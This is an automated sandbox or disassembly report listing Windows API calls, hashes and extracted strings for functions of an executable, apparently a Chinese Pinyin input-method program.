                                                                                                                                                                    • Instruction ID: 4be4238dd7416fa231f1726abf6a20e6cccd06dfdb36aee852b252467b73c5b4
                                                                                                                                                                    • Opcode Fuzzy Hash: d7c6ecfd7c38db9b44173bf9347e88f1b99ede48f4a8ef006e909d630f08e87f
                                                                                                                                                                    • Instruction Fuzzy Hash: 63E1B3716443028FC718EF29C8C09ABB7E6FB84305F244A2EE496D7780D774E985CB99
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • WaitForSingleObject.KERNEL32 ref: 00454086
                                                                                                                                                                    • HttpOpenRequestW.WININET(?,00000000,?,00000000,00000000,0055B1A0,80000000,00000000), ref: 004540C9
                                                                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004540E2
                                                                                                                                                                    • HttpQueryInfoW.WININET(00000000,20000013,?,?,00000000), ref: 00454117
                                                                                                                                                                    • InternetReadFile.WININET(00000000,00000000,00004000,?), ref: 0045415E
                                                                                                                                                                    • _memmove.LIBCMT ref: 0045417F
                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00454196
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Http$InternetRequest$CloseFileHandleInfoObjectOpenQueryReadSendSingleWait_memmove
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3184477364-0
                                                                                                                                                                    • Opcode ID: 372498111416804c42ba6cb1615839b0036c3bbc028bd23ee8ee6f21e0eb2c93
                                                                                                                                                                    • Instruction ID: 372a706307ef65fc00840b372681ed82e1e0b8ac61aa43fe1dbf9479d8a06740
                                                                                                                                                                    • Opcode Fuzzy Hash: 372498111416804c42ba6cb1615839b0036c3bbc028bd23ee8ee6f21e0eb2c93
                                                                                                                                                                    • Instruction Fuzzy Hash: 4641E371204300ABE320DF65EC09B6B7BE8AFE5755F04041DFA45DB281E778E54D8BAA
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • _memset.LIBCMT ref: 0041F23C
                                                                                                                                                                    • _memset.LIBCMT ref: 0041F25C
                                                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,?,00000000,?), ref: 0041F26C
                                                                                                                                                                    • PathCombineW.SHLWAPI(?,?,?,?,?,?,?,00000000,?), ref: 0041F28B
                                                                                                                                                                    • PathCombineW.SHLWAPI(?,?,00000000,?,?,?,?,00000000,?), ref: 0041F2A0
                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,00000000,?), ref: 0041F414
                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,00000000,?), ref: 0041F423
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AttributesCombineFilePath_memset$CreateDirectory
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2268274050-0
                                                                                                                                                                    • Opcode ID: f052304030d07fbb2b6681ddec58b59c6894973a77abd7aed4cb874a649a28be
                                                                                                                                                                    • Instruction ID: ca6c831d13b0beacf6cd5371a605e90b6124039848c9d0120295c50830f1606f
                                                                                                                                                                    • Opcode Fuzzy Hash: f052304030d07fbb2b6681ddec58b59c6894973a77abd7aed4cb874a649a28be
                                                                                                                                                                    • Instruction Fuzzy Hash: CE128FB15083818FD720DF25C885B8FB7E5BFD8304F04492EE5899B251E774A949CB9B
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004EF8DA: _malloc.LIBCMT ref: 004EF8F4
                                                                                                                                                                    • _memset.LIBCMT ref: 0043E672
                                                                                                                                                                    • PathCombineW.SHLWAPI(?,?,?), ref: 0043E69E
                                                                                                                                                                    • DeleteUrlCacheEntryW.WININET(000000E4), ref: 0043E708
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0043E712
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CacheCombineDeleteEntryErrorLastPath_malloc_memset
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1811335663-0
                                                                                                                                                                    • Opcode ID: a7260c8eea3163acfdb075f67b8a1cb3a733770b7efa0adddba2c309ed953744
                                                                                                                                                                    • Instruction ID: 1dd4de86536fa59e4ba02dbccd372c9fcc173062086b1285dd5419cee27ce236
                                                                                                                                                                    • Opcode Fuzzy Hash: a7260c8eea3163acfdb075f67b8a1cb3a733770b7efa0adddba2c309ed953744
                                                                                                                                                                    • Instruction Fuzzy Hash: D602CDB15083848FC724DF16C845BDBB7E4FF88308F045A1EE98997291E778A949CF96
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_malloc
                                                                                                                                                                    • String ID: {$$0 extend .$1 {$$0 extensions $1 to $2;$$0 message $1$$0 }$$0}$H$extend .$0 {
                                                                                                                                                                    • API String ID: 2100221131-3946144182
                                                                                                                                                                    • Opcode ID: 5b4e50b3708e5747707c8c0afa5d588711b5a52bc565d30c7d77253ca0d7cd45
                                                                                                                                                                    • Instruction ID: 3760276d07d860a45e8bb3e24e1a3219a5f1f401b2285a54418b7767ac6e2e38
                                                                                                                                                                    • Opcode Fuzzy Hash: 5b4e50b3708e5747707c8c0afa5d588711b5a52bc565d30c7d77253ca0d7cd45
                                                                                                                                                                    • Instruction Fuzzy Hash: 5472DFB19093819FC374CF1AC880ADBFBE4BBC9304F408A2EE59D87251DB749645CB96
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004C8270: _malloc.LIBCMT ref: 004C8271
                                                                                                                                                                    • LookupAccountNameW.ADVAPI32 ref: 004C8429
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004C8433
                                                                                                                                                                    • LookupAccountNameW.ADVAPI32(00000000,?,?,?,?,?,?), ref: 004C8482
                                                                                                                                                                      • Part of subcall function 00401050: __CxxThrowException@8.LIBCMT ref: 00401062
                                                                                                                                                                      • Part of subcall function 00401050: _memcpy_s.LIBCMT ref: 00401078
                                                                                                                                                                    • CopySid.ADVAPI32(09D48295,?,?), ref: 004C84A1
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AccountLookupName$CopyErrorException@8LastThrow_malloc_memcpy_s
                                                                                                                                                                    • String ID: D$D
                                                                                                                                                                    • API String ID: 3580705534-143366177
                                                                                                                                                                    • Opcode ID: 01954dede5401a9699005ab2a9a4e05b45dc81a0befbf807de599fc24e23be10
                                                                                                                                                                    • Instruction ID: fd7f0826cf6577601c6c2005b23ef3abe92e8f578b78705bfe30b6a543c8127f
                                                                                                                                                                    • Opcode Fuzzy Hash: 01954dede5401a9699005ab2a9a4e05b45dc81a0befbf807de599fc24e23be10
                                                                                                                                                                    • Instruction Fuzzy Hash: 6051C0755083419FC760DF51C840B9FB7E8EF88344F00492EF68993251DB78EA49CB9A
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • CryptDecodeObject.CRYPT32(00010001,00000008,00000000,00000000,00000000,00000000,00000000), ref: 0045686B
                                                                                                                                                                    • CryptDecodeObject.CRYPT32(00010001,00000008,qOE,00000000,00000000,00000000,?), ref: 0045689C
                                                                                                                                                                    • CryptDecodeObject.CRYPT32 ref: 004568C8
                                                                                                                                                                    • CryptDecodeObject.CRYPT32(00010001,00000013,?,?,00000000,00000000,?), ref: 004568F6
                                                                                                                                                                    • CryptImportKey.ADVAPI32(?,00000000,?,00000000,00000000,?,?,?,00455602), ref: 00456912
                                                                                                                                                                    Strings
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Crypt$DecodeObject$Import
                                                                                                                                                                    • String ID: qOE
                                                                                                                                                                    • API String ID: 2004819364-3676650912
                                                                                                                                                                    • Opcode ID: d1a2c7915e2466e210a584a1d69081c52db5bf340869f76768c84dc11870bb53
                                                                                                                                                                    • Instruction ID: 727fc4c49d4fe4a4bd7551409e3572da5a5ba0ff00da405d99ba658e3555bce7
                                                                                                                                                                    • Opcode Fuzzy Hash: d1a2c7915e2466e210a584a1d69081c52db5bf340869f76768c84dc11870bb53
                                                                                                                                                                    • Instruction Fuzzy Hash: 8221B6B26403057BE220CB51DC82F6BB3ACEB84B04F054519FE44AB281D6B0FC4887A6
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,0000000D,00000000,?,0044A207,?,00000454), ref: 004EE09A
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000454), ref: 004EE0A1
                                                                                                                                                                      • Part of subcall function 004EDFF8: IsProcessorFeaturePresent.KERNEL32(0000000C,004EE088,00000000,?,0044A207,?,00000454), ref: 004EDFFA
                                                                                                                                                                    • InterlockedPopEntrySList.KERNEL32(00000000,00000000,?,0044A207,?,00000454), ref: 004EE0B4
                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000454), ref: 004EE0C5
                                                                                                                                                                    • InterlockedPopEntrySList.KERNEL32(?,00000454), ref: 004EE0DD
                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000454), ref: 004EE0ED
                                                                                                                                                                    • InterlockedPushEntrySList.KERNEL32(00000000,?,00000454), ref: 004EE104
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: EntryInterlockedList$AllocHeapVirtual$FeatureFreePresentProcessProcessorPush
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2304957937-0
                                                                                                                                                                    • Opcode ID: 7803665e70c868f5318ee65c863790b8200f76d2ea413a89da0c411cd3fb8391
                                                                                                                                                                    • Instruction ID: 8c102e4cb00ea287f55320889518933fe6c3e3938ba085c33d70fd53f0a3f2ea
                                                                                                                                                                    • Opcode Fuzzy Hash: 7803665e70c868f5318ee65c863790b8200f76d2ea413a89da0c411cd3fb8391
                                                                                                                                                                    • Instruction Fuzzy Hash: 5C114931600A61E7D7321767EC09B2B7394AF617D3F210122F900D7290EBB9DC06AB6C
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • FindResourceW.KERNEL32(00000000,00000001,00000010,?,?,00000000), ref: 0043D11C
                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 0043D12A
                                                                                                                                                                    • LockResource.KERNEL32(00000000,?), ref: 0043D136
                                                                                                                                                                    • SizeofResource.KERNEL32(00000000,00000000), ref: 0043D140
                                                                                                                                                                    • _memmove.LIBCMT ref: 0043D15D
                                                                                                                                                                    • VerQueryValueW.VERSION(00000000,0053065C,?,?), ref: 0043D175
                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0043D18E
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Resource$FindFreeLibraryLoadLockQuerySizeofValue_memmove
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1965330434-0
                                                                                                                                                                    • Opcode ID: 720c01d29aa36f89ed117db79694d64507b2926183f78d8a78f3b8e661de19ec
                                                                                                                                                                    • Instruction ID: fa70ab4448b6959269a01cf960b42c66f9a771de086f8ebef818bf7e303f36bf
                                                                                                                                                                    • Opcode Fuzzy Hash: 720c01d29aa36f89ed117db79694d64507b2926183f78d8a78f3b8e661de19ec
                                                                                                                                                                    • Instruction Fuzzy Hash: 0601F5779003107BC320EF339C49CAB7AEDFFAA391F04092AF905D2240E634C40A86B9
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(0055F688,?,0040D374,09D48295), ref: 0040D296
                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0040D2C6
                                                                                                                                                                      • Part of subcall function 004EE3DB: std::exception::exception.LIBCMT ref: 004EE3F0
                                                                                                                                                                      • Part of subcall function 004EE3DB: __CxxThrowException@8.LIBCMT ref: 004EE405
                                                                                                                                                                      • Part of subcall function 004EE3DB: std::exception::exception.LIBCMT ref: 004EE416
                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(?,0040D374,09D48295), ref: 0040D2D7
                                                                                                                                                                    • __set_purecall_handler.LIBCMT ref: 0040D2E6
                                                                                                                                                                    • __set_purecall_handler.LIBCMT ref: 0040D2F4
                                                                                                                                                                    Strings
                                                                                                                                                                    • invalid vector<T> subscript, xrefs: 0040D2C1
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __set_purecall_handlerstd::exception::exception$CriticalEnterExceptionException@8FilterSectionThrowUnhandledXinvalid_argumentstd::_
                                                                                                                                                                    • String ID: invalid vector<T> subscript
                                                                                                                                                                    • API String ID: 213303058-3016609489
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004EF8DA: _malloc.LIBCMT ref: 004EF8F4
                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0042214D
                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 00422A4E
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00001388,09D48295,?,0052FD98,?), ref: 00422B07
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Xinvalid_argumentstd::_$ObjectSingleWait_malloc
                                                                                                                                                                    • String ID: list<T> too long$vector<T> too long
                                                                                                                                                                    • API String ID: 2774856280-355118384
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • _memmove.LIBCMT ref: 0047167C
                                                                                                                                                                      • Part of subcall function 004EF8DA: _malloc.LIBCMT ref: 004EF8F4
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _malloc_memmove
                                                                                                                                                                    • String ID: H
                                                                                                                                                                    • API String ID: 1183979061-2852464175
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • _memset.LIBCMT ref: 004430BA
                                                                                                                                                                      • Part of subcall function 004C4B90: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 004C4BE9
                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004430FE
                                                                                                                                                                    • _memset.LIBCMT ref: 004431EB
                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000800,00000059,?,00000104,?,?,?), ref: 00443207
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Close_memset$HandleInfoLocale
                                                                                                                                                                    • String ID: brand
                                                                                                                                                                    • API String ID: 3341748452-475199832
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryW.KERNEL32(ieframe.dll,77488B40,?,004177F7,?,?,?,?,?,?,?,?,?,?), ref: 00414287
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 004142A6
                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 004142C4
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                    • String ID: IEIsProtectedModeProcess$ieframe.dll
                                                                                                                                                                    • API String ID: 145871493-256698251
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CombinePath_memset
                                                                                                                                                                    • String ID: english$index$model$stock_shuangpin_dict$sysbitmap$sysdict
                                                                                                                                                                    • API String ID: 911062509-427922327
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0040D290: EnterCriticalSection.KERNEL32(0055F688,?,0040D374,09D48295), ref: 0040D296
                                                                                                                                                                      • Part of subcall function 0040D290: std::_Xinvalid_argument.LIBCPMT ref: 0040D2C6
                                                                                                                                                                      • Part of subcall function 0040D290: SetUnhandledExceptionFilter.KERNEL32(?,0040D374,09D48295), ref: 0040D2D7
                                                                                                                                                                      • Part of subcall function 0040D290: __set_purecall_handler.LIBCMT ref: 0040D2E6
                                                                                                                                                                      • Part of subcall function 0040D290: __set_purecall_handler.LIBCMT ref: 0040D2F4
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0040D3A4
                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(0040D340), ref: 0040D3E2
                                                                                                                                                                    • __set_purecall_handler.LIBCMT ref: 0040D3ED
                                                                                                                                                                    • __set_purecall_handler.LIBCMT ref: 0040D3FA
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(0055F688), ref: 0040D40D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __set_purecall_handler$CriticalExceptionFilterSectionUnhandled$CurrentEnterLeaveThreadXinvalid_argumentstd::_
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2425247346-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • _memmove.LIBCMT ref: 004511AE
                                                                                                                                                                      • Part of subcall function 00485150: EnterCriticalSection.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,09D48295,00000000,00000000), ref: 004851A4
                                                                                                                                                                      • Part of subcall function 00485150: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,09D48295,00000000,00000000), ref: 004851B7
                                                                                                                                                                      • Part of subcall function 00485150: __CxxThrowException@8.LIBCMT ref: 00485234
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterException@8LeaveThrow_memmove
                                                                                                                                                                    • String ID: CHECK failed: (&from) != (this): $g$h5S
                                                                                                                                                                    • API String ID: 499820034-3496901833
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Version
                                                                                                                                                                    • String ID: %d.%d$_x64$_x86
                                                                                                                                                                    • API String ID: 1889659487-901740950
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$CompareEnterExchangeInterlockedLeaveSleep_malloc
                                                                                                                                                                    • String ID: CHECK failed: file != NULL: $K$h5S$i18n/cjk/ime/sync/sync_service.proto$tIS
                                                                                                                                                                    • API String ID: 90256291-506951452
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?), ref: 0042B2C4
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ObjectSingleWait
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 24740636-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • CryptQueryObject.CRYPT32(00000001,?,00000400,0000000E,00000000,?,?,?,?,00000000,00000000), ref: 0045C8E0
                                                                                                                                                                    • CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 0045C8FA
                                                                                                                                                                      • Part of subcall function 004EF8DA: _malloc.LIBCMT ref: 004EF8F4
                                                                                                                                                                    • CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 0045C937
                                                                                                                                                                      • Part of subcall function 0045C410: CertDuplicateCertificateContext.CRYPT32(00000000), ref: 0045C49D
                                                                                                                                                                    • CertCloseStore.CRYPT32(?,00000000), ref: 0045C949
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Cert$Store$CertificatesEnum$CertificateCloseContextCryptDuplicateObjectQuery_malloc
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 779759517-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0000D340,0040D770,00000000,00000000,?,?,?,?,?,00000000,00000050,09D48295,?,?), ref: 0040D305
                                                                                                                                                                    • __set_purecall_handler.LIBCMT ref: 0040D310
                                                                                                                                                                      • Part of subcall function 004EEF10: DecodePointer.KERNEL32(?,?,0040CEB2,0040D430), ref: 004EEF1C
                                                                                                                                                                      • Part of subcall function 004EEF10: EncodePointer.KERNEL32(?,?,0040CEB2,0040D430), ref: 004EEF27
                                                                                                                                                                    • __set_purecall_handler.LIBCMT ref: 0040D31A
                                                                                                                                                                      • Part of subcall function 004EF7ED: DecodePointer.KERNEL32(?,?,0040CEC5,0040D620,00000001), ref: 004EF7F9
                                                                                                                                                                      • Part of subcall function 004EF7ED: EncodePointer.KERNEL32(0040CEC5,?,0040CEC5,0040D620,00000001), ref: 004EF804
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(0055F688,?,?,?,?,?,?,00000000,00000050,09D48295,?,?), ref: 0040D32D
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Pointer$DecodeEncode__set_purecall_handler$CriticalExceptionFilterLeaveSectionUnhandled
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1822871419-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$CompareEnterExchangeInterlockedLeaveSleep_malloc
                                                                                                                                                                    • String ID: 9$CHECK failed: file != NULL: $i18n/cjk/ime/hosting/proto/download_item.proto$&S
                                                                                                                                                                    • API String ID: 90256291-3165441767
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • GetSystemTime.KERNEL32(?,09D48295), ref: 0044164E
                                                                                                                                                                    • RegSetValueExW.ADVAPI32(?,LastPing,00000000,00000004,?,00000004), ref: 00441687
                                                                                                                                                                      • Part of subcall function 00443060: _memset.LIBCMT ref: 004430BA
                                                                                                                                                                      • Part of subcall function 00443060: RegCloseKey.ADVAPI32(?), ref: 004430FE
                                                                                                                                                                      • Part of subcall function 00465540: CreateMutexW.KERNEL32(00000000,00000000,GPY_DATA_STAT_MUTEX_2,00000000), ref: 004655C5
                                                                                                                                                                      • Part of subcall function 00465820: WaitForSingleObject.KERNEL32(?,000003E8,09D48295), ref: 00465864
                                                                                                                                                                      • Part of subcall function 00461750: DeleteCriticalSection.KERNEL32(?,09D48295,?,?,00000001,?,0050E328,000000FF,004D48E8,?,09D48295,?,?,00000001,00000000,0050FB63), ref: 00461790
                                                                                                                                                                      • Part of subcall function 00461750: CloseHandle.KERNEL32(?), ref: 0046179E
                                                                                                                                                                      • Part of subcall function 00461750: CloseHandle.KERNEL32(?), ref: 004617A8
                                                                                                                                                                      • Part of subcall function 00461750: CloseHandle.KERNEL32(?,09D48295,?,?,00000001,?,0050E328,000000FF,004D48E8,?,09D48295,?,?,00000001,00000000,0050FB63), ref: 004617C8
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Close$Handle$CreateCriticalDeleteMutexObjectSectionSingleSystemTimeValueWait_memset
                                                                                                                                                                    • String ID: LastPing
                                                                                                                                                                    • API String ID: 2807491785-328612645
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    • AllocateAndInitializeSid.ADVAPI32 ref: 004113BD
                                                                                                                                                                    • CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 004113D6
                                                                                                                                                                    • FreeSid.ADVAPI32(?), ref: 004113E9
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3429775523-0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
